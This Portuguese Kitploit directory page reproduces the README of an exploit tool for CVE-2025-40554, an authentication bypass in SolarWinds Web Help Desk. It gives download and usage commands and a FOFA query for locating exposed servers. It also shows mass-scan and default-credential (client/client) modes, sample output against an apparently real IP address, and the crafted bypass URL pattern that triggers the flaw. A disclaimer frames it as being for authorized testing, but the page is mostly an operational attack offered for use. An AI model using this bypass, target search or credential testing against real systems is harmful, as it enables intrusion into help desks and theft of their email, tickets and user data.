Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-40554 — CVE-2025-40554 Exploitation | Kitploit
Ferramentas/GitHubGitHub/skynoxk/cve-2025-40554
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingAuthentication
GitHubskynoxk/cve-2025-40554

CVE-2025-40554

CVE-2025-40554 Exploitation

Ver Repositório
há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Suíte de Exploração CVE-2025-40554

Uma ferramenta abrangente de teste de segurança para detectar e explorar a vulnerabilidade de bypass de autenticação (CVE-2025-40554 / CVE-2025-40536) no SolarWinds Web Help Desk.

⚠️ Aviso Legal

APENAS PARA FINS EDUCACIONAIS E DE TESTES DE SEGURANÇA AUTORIZADOS

Esta ferramenta é fornecida para pesquisa de segurança, testes de penetração e avaliação de vulnerabilidades em sistemas que você possui ou para os quais possui permissão explícita por escrito para testar. O acesso não autorizado a sistemas de computador é ilegal. Os autores não são responsáveis pelo uso indevido ou por danos causados por esta ferramenta.

🔍 Visão Geral da Vulnerabilidade

CVE-2025-40554 é uma vulnerabilidade crítica de bypass de autenticação no SolarWinds Web Help Desk que permite que atacantes não autenticados:

  • Contornar mecanismos de autenticação
  • Acessar funções administrativas privilegiadas (Autenticação)
  • Enumerar a configuração do sistema

Versões Afetadas

  • SolarWinds Web Help Desk (as informações sobre a versão específica devem ser verificadas)
  • Consulte os avisos de segurança da SolarWinds para versões corrigidas

🚀 Recursos

Verifique por conta própria :))

Dependências:

  • Python 3.6+
  • biblioteca requests
  • biblioteca urllib3

🛠️ Instalação

root@kitploit:~
# Clone or download the script
wget https://raw.githubusercontent.com/username/repo/main/CVE-2025-40554.py

# Make executable
chmod +x CVE-2025-40554.py

📖 FOFA

root@kitploit:~
("Web Help Desk") && (icon_hash="1895809524" || icon_hash="804130677")

📖 Uso

Varredura Básica (Alvo Único)

root@kitploit:~
# Simple vulnerability check
python3 CVE-2025-40554.py -t https://target:8443

# With explicit protocol
python3 CVE-2025-40554.py -t https://203.106.221.203:8443

Modo de Exploração Completo

root@kitploit:~
# Complete exploitation with session enumeration
python3 CVE-2025-40554.py -t https://target:8443 --exploit

# Skip default credential testing
python3 CVE-2025-40554.py -t https://target:8443 --exploit --no-login

Varredura em Massa

root@kitploit:~
# Scan multiple targets from file
python3 CVE-2025-40554.py -l targets.txt

# Bulk scan with exploitation
python3 CVE-2025-40554.py -l targets.txt --exploit

# Quiet mode (minimal output)
python3 CVE-2025-40554.py -l targets.txt -q

# Custom output file
python3 CVE-2025-40554.py -l targets.txt -o results.txt

Formato do Arquivo de Alvos

targets.txt:

root@kitploit:~
https://target1:8443
https://target2.example.com:8443
192.168.1.100:8443
target3.local:8443
# Comments are supported

🎯 Opções de Linha de Comando

📊 Exemplos de Saída

Exploração Bem-sucedida

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║     CVE-2025-40554 - SolarWinds Web Help Desk                    ║
║     Authentication Bypass Exploitation Tool                       ║
║     Research & Educational Purposes Only                          ║
╚═══════════════════════════════════════════════════════════════════╝

======================================================================
Target: https://203.106.221.203:8443
======================================================================
[*] Step 1: Establishing session...
[+] WOSID extracted: AbCdEfGhIjKlMnOpQrStU
[+] XSRF token: abc123-def456-ghi789

[*] Step 2: Testing authentication bypass...
[+] Found bypass indicators: externalAuthContainer, JSONRpcClient, SAML 2.0
[+] VULNERABLE - Auth bypass confirmed!

[*] Step 3: Testing default credentials (client/client)...
[+] SUCCESS - Default credentials work!

======================================================================
EXPLOITATION MODE - CVE-2025-40554 Auth Bypass
======================================================================

[*] Bypass URL: https://203.106.221.203:8443/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AbCdEfGhIjKlMnOpQrStU/1.0?badparam=/ajax/&wopage=LoginPref
[*] Triggering authentication bypass...
[+] Auth bypass successful!

[*] Session Cookies:
  wosid = AbCdEfGhIjKlMnOpQrStU
  XSRF-TOKEN = abc123-def456-ghi789

======================================================================
SUMMARY
======================================================================
[+] Target is VULNERABLE to CVE-2025-40554
[+] Default credentials: WORK
======================================================================

Resultados da Varredura em Massa

root@kitploit:~
[*] Loaded 5 unique targets from targets.txt
[*] Mode: Bypass + default credential test
[*] Full exploitation enabled

[1/5] Testing https://target1:8443
[+] VULNERABLE - Auth bypass confirmed!
[+] SUCCESS - Default credentials work!

[2/5] Testing https://target2:8443
[!] NOT VULNERABLE - Auth bypass failed

...

======================================================================
SCAN SUMMARY
======================================================================
Total scanned:     5/5
Vulnerable:        2
With def. creds:   1
======================================================================

[+] Results saved to: vulnerable_targets.txt

🔧 Detalhes Técnicos

Fluxo de Exploração

  1. Estabelecimento de Sessão

    • Conecta-se à instância WHD
    • Extrai o WOSID (ID de Sessão do WebObjects) de várias fontes
    • Captura o token XSRF, se presente
  2. Bypass de Autenticação

    • Cria URL maliciosa com injeção de WOSID
    • Explora path traversal no roteamento do WebObjects
    • Contorna as verificações de autenticação
  3. Teste de Credenciais (opcional)

    • Analisa o formulário de login com proteção CSRF
    • Testa credenciais padrão (client/client)
    • Valida a autenticação bem-sucedida
  4. Exploração Completa (modo --exploit)

    • Exporta cookies de sessão
    • acesso a e-mail, tickets, banco de dados, usuários, (removido)

Indicadores de Vulnerabilidade

A ferramenta detecta o bypass bem-sucedido verificando:

  • externalAuthContainer - configuração de autenticação externa
  • JSONRpcClient - exposição do cliente de API
  • SAML 2.0 - configuração de SSO
  • LoginPref - configurações de preferência de login
  • authMode - configurações do modo de autenticação

🤝 Contribuição

Contribuições são bem-vindas.....

📚 Referências

  • Detalhes do CVE-2025-40554
  • Detalhes do CVE-2025-40536
  • Avisos de Segurança da SolarWinds
  • Documentação do Framework WebObjects

📄 Licença

Esta ferramenta é fornecida "como está", sem garantia de qualquer tipo. Use por sua conta e risco.

👤 Autor

Skynoxk


Lembre-se: Sempre hackeie de forma ética e legal. O acesso não autorizado é um crime.

Baixar ferramenta
OptionDescription
-t, --target URLURL do alvo único a testar
-l, --list FILEArquivo contendo lista de alvos (um por linha)
--exploitAtiva o modo de exploração completo com enumeração
--no-loginPula o teste de credenciais padrão
-o, --output FILEArquivo de saída para alvos vulneráveis (padrão: vulnerable_targets.txt)
-q, --quietModo de saída mínima (útil para varreduras em massa)